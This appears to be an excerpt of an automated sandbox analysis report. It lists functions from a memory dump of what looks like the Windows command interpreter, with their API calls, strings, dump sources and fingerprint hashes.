                                    • Instruction Fuzzy Hash: D7219530201502ABDF2DEF6AD868D6EBB69FF60714714822DEB4583544DF30D891CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E0178, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                    Download Yara Rule
                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E0183
                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011E01B8
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000001), ref: 011E01C7
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E01D2
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011E01DB
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                    • String ID:
                                    • API String ID: 513048808-0
                                    • Opcode ID: 306aa1c7617f198a2a300640dd63d2c94be328a6d1716819b0d9c16c7d09af67
                                    • Instruction ID: 44af7ff06a87fcd81453e106437cc6fc443c273649ccdf173e83130d95c542f6
                                    • Opcode Fuzzy Hash: 306aa1c7617f198a2a300640dd63d2c94be328a6d1716819b0d9c16c7d09af67
                                    • Instruction Fuzzy Hash: 6811E333D04A51ABEB29C7ACA90CB7B3AFCE759235F150315F82696084CBB4C980C752
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E269C, Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E26A7
                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                    • String ID:
                                    • API String ID: 513048808-0
                                    • Opcode ID: 06bf5e13bcd1366657ca3b88040df9bdfdde6bdc6688e52f19cc0ce836b5b684
                                    • Instruction ID: 79ae1ad7e29900b8fcc99a4db4bca68fb94ce915f47b133b4d7319d3cc6efc41
                                    • Opcode Fuzzy Hash: 06bf5e13bcd1366657ca3b88040df9bdfdde6bdc6688e52f19cc0ce836b5b684
                                    • Instruction Fuzzy Hash: 3A01F733C14C246B9E3952FCAC6CDBB36DCE6652347210321FC25D24C5DF758C854691
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DFE10, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • memset.MSVCRT ref: 011EC954
                                    • longjmp.MSVCRT(0120B8F8,000000FF,00000000,01203892,01203890,?,?,?,?,011DFD5C,?,?,?,011E837D,00000000), ref: 011EC96D
                                    • memcpy.MSVCRT ref: 011EC987
                                    • longjmp.MSVCRT(0120B8F8,000000FF,01203892,01203890,?,?,?,?,011DFD5C,?,?,?,011E837D,00000000), ref: 011EC9D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                    • String ID: 0123456789
                                    • API String ID: 2034586978-2793719750
                                    • Opcode ID: ab58ff94ca7811257a50575d93aba93322aad1c91b3e3ba362e65e5a85b342b9
                                    • Instruction ID: 892ae28ae374b134047c022107edaa056674a4bc3f41c6ec0e2555b9fa4dbe0b
                                    • Opcode Fuzzy Hash: ab58ff94ca7811257a50575d93aba93322aad1c91b3e3ba362e65e5a85b342b9
                                    • Instruction Fuzzy Hash: 69712635B002179FEB2DDA6CD84C76A7BE1EF84704F194169D906AB386EB709B43C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E6390, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 183COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011E63D6
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E64BF
                                    • iswspace.MSVCRT ref: 011EF751
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: wcschr$iswspacememset
                                    • String ID: %s
                                    • API String ID: 2220997661-3043279178
                                    • Opcode ID: 3111916c693a68d54360fa4a4b35737f4677efdd8e221b84e2c2d39982f27fc9
                                    • Instruction ID: 7390d7a9f5fcb49a626bf0bc735216243d7e8b48e7398698481710cee3615466
                                    • Opcode Fuzzy Hash: 3111916c693a68d54360fa4a4b35737f4677efdd8e221b84e2c2d39982f27fc9
                                    • Instruction Fuzzy Hash: 38512675A009169BDB2CDFA8E8496BBB7F6FF58254F14015DDC05D7240EB308982C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F85E9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 174COMMON
                                    Download Yara Rule
                                    APIs
                                    • longjmp.MSVCRT(0120B8F8,00000001,00000000,011F8DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 011F865D
                                    • memset.MSVCRT ref: 011F86B6
                                    • memset.MSVCRT ref: 011F86E4
                                    • memset.MSVCRT ref: 011F8712
                                      • Part of subcall function 011DCD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,011F9362,00000000,00000000,?,011E9814,00000000), ref: 011DCD55
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                      • Part of subcall function 011D585F: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,0000FE00,00001000,00000004,00000000,?,00000001,?,011F87AD,?,00000000,-00000105,-00000105,-00000105), ref: 011D5875
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$AllocCloseFindVirtuallongjmp
                                    • String ID: %9d
                                    • API String ID: 973120493-2241623522
                                    • Opcode ID: af42e88ca2e9f14b4f30493f72a61aec06a2a1af03033cb19f9ae5cdeb0f0d5c
                                    • Instruction ID: 07a11b7b33a58720572a15f09c5808ba03a2de520c30c490bd93c67c36ebebe5
                                    • Opcode Fuzzy Hash: af42e88ca2e9f14b4f30493f72a61aec06a2a1af03033cb19f9ae5cdeb0f0d5c
                                    • Instruction Fuzzy Hash: CD51F8B1A087819BD32CDF74D8856AF7BE9EB94318F04092EF689D3240EB74D940CB56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F6456, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 125memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 011F64A1
                                    • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 011F6517
                                    • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 011F657F
                                    Strings
                                    • %WINDOWS_COPYRIGHT%, xrefs: 011F6487
                                    • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 011F646E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                    • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                    • API String ID: 1103618819-4062316587
                                    • Opcode ID: fcdebe67506d7c5edcd2f9c8988b51216db60d79dd470bc185e1a4cce3491c86
                                    • Instruction ID: 6b238cb15df7aefa38a59d2d1356d3b57867e851cb587cb24cbcd8520b147d85
                                    • Opcode Fuzzy Hash: fcdebe67506d7c5edcd2f9c8988b51216db60d79dd470bc185e1a4cce3491c86
                                    • Instruction Fuzzy Hash: D2412335A002158BDF28DFA898587BA77B2EF48740B59006DEB06EB354EB659D43C381
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F2BF0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 011F2CA5
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F2CB7
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011F2D29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CloseErrorHandleLastOpenSemaphore
                                    • String ID: _p0$wil
                                    • API String ID: 3419097560-1814513734
                                    • Opcode ID: 7b39d931cc50ce7435aea43c0b143335bf92b3e1e5908fbd213a410e3b60aff0
                                    • Instruction ID: 5ef3c9a16b988b78459f583e3ef312d357a3e061fc114252ff7629f96343635a
                                    • Opcode Fuzzy Hash: 7b39d931cc50ce7435aea43c0b143335bf92b3e1e5908fbd213a410e3b60aff0
                                    • Instruction Fuzzy Hash: 7D411971A001298BDB3DDF68C958BEA37B5EB94710F1582ACDA09DB284DB70CD45CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F4588, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110COMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcsnicmp.MSVCRT ref: 011F4635
                                      • Part of subcall function 011E7721: __iob_func.MSVCRT ref: 011E7726
                                    • fprintf.MSVCRT ref: 011F45B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: __iob_func_wcsnicmpfprintf
                                    • String ID: CMD Internal Error %s$%s$Null environment
                                    • API String ID: 1828771275-2781220306
                                    • Opcode ID: 73c35d796b22afe0064f1cbfefa068b9d0b0a510060282d93b54ee9e2b7a0c57
                                    • Instruction ID: 5ff6aa4390d4c47a6fd76ce5ab5c55080b935e425ef280e3173e00a2876c3549
                                    • Opcode Fuzzy Hash: 73c35d796b22afe0064f1cbfefa068b9d0b0a510060282d93b54ee9e2b7a0c57
                                    • Instruction Fuzzy Hash: 90315D36E00211DBCF3CEFAC98496AFB7A4EF94614F05056DEE1AA3A40EB705E01C785
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D68D9, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011DDEF9: iswspace.MSVCRT ref: 011DDF07
                                      • Part of subcall function 011DDEF9: wcschr.MSVCRT ref: 011DDF18
                                    • wcschr.MSVCRT ref: 011D6914
                                    • wcschr.MSVCRT ref: 011D6926
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: wcschr$iswspace
                                    • String ID: &<|>$+: $=,;
                                    • API String ID: 3458554142-2256444845
                                    • Opcode ID: 1a0e87eabb4008aed4f71cb8701fde41ff4a6be9fbfd52bb5a0bc74dbcca669f
                                    • Instruction ID: a9fe4d00383210e98b869d9fe7eb476e0939fec3fc86c21e78e800352c0d37be
                                    • Opcode Fuzzy Hash: 1a0e87eabb4008aed4f71cb8701fde41ff4a6be9fbfd52bb5a0bc74dbcca669f
                                    • Instruction Fuzzy Hash: F5213672A44266EECB3C8B6AD4146BEB7E6EFA5624B25406EE9C4D7281FB315C40C350
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D4476, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 011D449A
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 011D44BE
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011D44C9
                                    Strings
                                    • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 011D4490
                                    • UBR, xrefs: 011D44B6
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                    • API String ID: 3677997916-3870813718
                                    • Opcode ID: 341782f4096967f6999651fb1b218e099537412315344c0bf1d0db6685606b0c
                                    • Instruction ID: cf61cfdaed9bdab0fba005ebbc4d1a8afd27dee39561569764b46a22f792f7b7
                                    • Opcode Fuzzy Hash: 341782f4096967f6999651fb1b218e099537412315344c0bf1d0db6685606b0c
                                    • Instruction Fuzzy Hash: 2D011D76A80218BBDF32DA95EC49FEEBBBCEB84710F140166E901A2541D7705A90DB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E465D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,011E4533), ref: 011E4687
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,011E4533), ref: 011E46A7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: KERNEL32.DLL$SetThreadUILanguage
                                    • API String ID: 1646373207-2530943252
                                    • Opcode ID: 080c9b530a108bded239eefbbd1e3a92f6c5b5adacabc531f5a9a98d98c50c2f
                                    • Instruction ID: 3b5fc911d88dba34504388ba82aaf093f55f1a55b3758242c60c83724ef66324
                                    • Opcode Fuzzy Hash: 080c9b530a108bded239eefbbd1e3a92f6c5b5adacabc531f5a9a98d98c50c2f
                                    • Instruction Fuzzy Hash: 6601A730940614DBCB3C9BA8B81CB693BE49B58A2DB05026DF936DB284CF705C819B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E1F52, Relevance: 7.8, APIs: 5, Instructions: 293COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011E1FA3
                                    • wcsspn.MSVCRT ref: 011E2181
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2278
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D87
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D91
                                      • Part of subcall function 011E2D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DA4
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DAE
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                    • String ID:
                                    • API String ID: 1535828850-0
                                    • Opcode ID: 372b82de383cddab2aba8b4403b4f13fde9c7e4fe45ca5d48b4c4e74f269362f
                                    • Instruction ID: d3a4a764105d28c0265579dc273ab993552439345fa951b2646c1cd28c9dcc11
                                    • Opcode Fuzzy Hash: 372b82de383cddab2aba8b4403b4f13fde9c7e4fe45ca5d48b4c4e74f269362f
                                    • Instruction Fuzzy Hash: A1C19E75A00605CFDB29DFA8D898BA9B7F6BF54304F14819DD50A9B394DB309A82CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E3B5D, Relevance: 7.7, APIs: 5, Instructions: 155COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011E3B91
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E3CF6
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • longjmp.MSVCRT(0120B8B8,00000001,-00000001,00000000,?,00000000), ref: 011EE015
                                      • Part of subcall function 011DC923: _wcsicmp.MSVCRT ref: 011DC9CF
                                      • Part of subcall function 011DC923: _wcsicmp.MSVCRT ref: 011DC9E5
                                      • Part of subcall function 011DC923: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 011DCA04
                                      • Part of subcall function 011DC923: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DCA15
                                      • Part of subcall function 011E36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,011D590A,00000000), ref: 011E36F0
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D87
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D91
                                      • Part of subcall function 011E2D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DA4
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DAE
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,-00000001,00000000,?,00000000), ref: 011E3CC5
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011E3CD0
                                      • Part of subcall function 011E2349: wcsrchr.MSVCRT ref: 011E234F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Error$Mode$AttributesFileHeapLast_wcsicmpmemset$AllocCurrentDirectoryFullNamePathProcesslongjmpwcsrchr
                                    • String ID:
                                    • API String ID: 3402406610-0
                                    • Opcode ID: 5547aedaad0c5c857ebabfe46767c708a27ff67f6d3433009716d0b3b02945d9
                                    • Instruction ID: ae59b34ea5c5032b665c0d0424968dee3e3e5ff6580ad2d72d3ef3260354f571
                                    • Opcode Fuzzy Hash: 5547aedaad0c5c857ebabfe46767c708a27ff67f6d3433009716d0b3b02945d9
                                    • Instruction Fuzzy Hash: 9C51B331A006169BDB3CDBE9A84C67EBBF5FF58714F54046AE919D7280EB30C980CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DB710, Relevance: 7.6, APIs: 5, Instructions: 132COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$_setjmp3
                                    • String ID:
                                    • API String ID: 4215035025-0
                                    • Opcode ID: bb1d4160cea00cf6a6d98fe0fbc7ee8a2e6d03b16fb976b09212939062738f09
                                    • Instruction ID: 3f139567240e9f0b455cbc1c4d7c3ad1a7aa79a9b5a0e0ac35a533ea88d43fc1
                                    • Opcode Fuzzy Hash: bb1d4160cea00cf6a6d98fe0fbc7ee8a2e6d03b16fb976b09212939062738f09
                                    • Instruction Fuzzy Hash: 6A41B271E052299FDF29CAA5DC88AEEBBB4FB45304F0401ADE609A3140DB309A84CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F8F66, Relevance: 7.6, APIs: 5, Instructions: 106COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011F8FA5
                                    • memset.MSVCRT ref: 011F8FC5
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • _wcsicmp.MSVCRT ref: 011F9073
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F9085
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F9092
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$_wcsicmp
                                    • String ID:
                                    • API String ID: 1670951261-0
                                    • Opcode ID: 8e93e8e5aa6be53fbf4aed118e250d3a6fcf944781d938ced00d4d3fb73568bf
                                    • Instruction ID: 24969437e27e406e2c8bd999c452609998dcf48dbfd9787ffe554203ceaac5a3
                                    • Opcode Fuzzy Hash: 8e93e8e5aa6be53fbf4aed118e250d3a6fcf944781d938ced00d4d3fb73568bf
                                    • Instruction Fuzzy Hash: B7316B71A0021E57DF29DAA5DC58BEEBBB8EF54358F0401ADFA05D3141DB749E80CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F8E52, Relevance: 7.6, APIs: 5, Instructions: 103fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F8E99
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F8EA1
                                    • _get_osfhandle.MSVCRT ref: 011F8F27
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,00000000,00000000), ref: 011F8F2F
                                      • Part of subcall function 011F85E9: longjmp.MSVCRT(0120B8F8,00000001,00000000,011F8DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 011F865D
                                      • Part of subcall function 011F85E9: memset.MSVCRT ref: 011F86B6
                                      • Part of subcall function 011F85E9: memset.MSVCRT ref: 011F86E4
                                      • Part of subcall function 011F85E9: memset.MSVCRT ref: 011F8712
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F8F40
                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                    • String ID:
                                    • API String ID: 288106245-0
                                    • Opcode ID: 773e027faaebab1219d787cd66d324fdce7f244a37c1f36f93db1f2f4a614266
                                    • Instruction ID: 23731189a15aac567ff3350d6f0802bc93be1c5c9a511d952ba88e2b1329f2a5
                                    • Opcode Fuzzy Hash: 773e027faaebab1219d787cd66d324fdce7f244a37c1f36f93db1f2f4a614266
                                    • Instruction Fuzzy Hash: 0C31D171E10219AFEF2CDF69D859BAE77AAEB94324F10812EE601C72C5DF7099408B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D5712, Relevance: 7.6, APIs: 5, Instructions: 98fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011D5734
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011F896D,00000021,?,?,00000000,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 011D573C
